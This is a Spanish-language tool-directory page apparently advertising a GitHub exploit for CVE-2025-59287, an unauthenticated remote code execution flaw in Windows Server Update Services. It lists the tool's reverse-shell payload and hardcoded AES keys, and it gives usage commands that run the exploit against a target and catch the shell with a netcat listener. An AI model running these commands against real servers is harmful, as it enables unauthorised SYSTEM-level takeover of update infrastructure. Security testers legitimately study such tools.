Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2025-59287 — Exploit automatizado para CVE-2025-59287, una RCE no autenticada en WSUS, que incluye generación de payloads, listener de reverse shell y cifrado AES con claves hardcodeadas. | Kitploit
Herramientas/GitHubGitHub/garvitv14/cve-2025-59287
Generación de PayloadsAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónComando y ControlHerramienta de Acceso Remoto
GitHubgarvitv14/cve-2025-59287

CVE-2025-59287

Exploit automatizado para CVE-2025-59287, una RCE no autenticada en WSUS, que incluye generación de payloads, listener de reverse shell y cifrado AES con claves hardcodeadas.

Ver Repositorio
162hace 10 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

Exploit RCE de CVE-2025-59287 WSUS

Exploit automatizado para la vulnerabilidad de ejecución remota de código no autenticada en Windows Server Update Services (WSUS).

Detalles de la Vulnerabilidad

  • ID de CVE: CVE-2025-59287
  • Puntuación CVSS: 9.8 (Crítico)
  • Vector de Ataque: Red
  • Autenticación: No se requiere
  • Impacto: Ejecución remota de código como SYSTEM

Características

✅ Generación de payload totalmente automatizada
✅ Descarga automática de la dependencia ysoserial.NET
✅ Listener de reverse shell integrado
✅ Soporte multiplataforma (Windows/Linux/Mac)
✅ Cifrado AES con claves hardcodeadas de WSUS
✅ Payload de reverse shell en PowerShell

Requisitos

pip install -r requirements.txt

Dependencias de Python

Runtime .NET (Detección automática)

  • Windows: .NET Framework (integrado)
  • Linux/Mac: Wine o Mono Ubuntu/Debian
  • sudo apt install wine-stable

    sudo apt install mono-complete

    Instalación

    Clona o descarga los archivos del exploit

    cd CVE-2025-59287-exploit

    Ejecuta el exploit (descarga automáticamente ysoserial.NET)

    python3 exploit.py -u http://target:8530 -lhost TU_IP -lport 4444

    Uso

    Explotación Básica

    python3 exploit.py -u http://192.168.1.100:8530 -lhost 10.10.14.5 -lport 4444

    Si quieres la sesión en otro listener

    Terminal 1: Inicia el listener de netcat

    nc -lvnp 4444

    Terminal 2: Ejecuta el exploit sin el listener integrado

    python3 exploit.py -u http://target:8530 -lhost 10.10.14.5 -lport 4444 --no-listener

    Descargar herramienta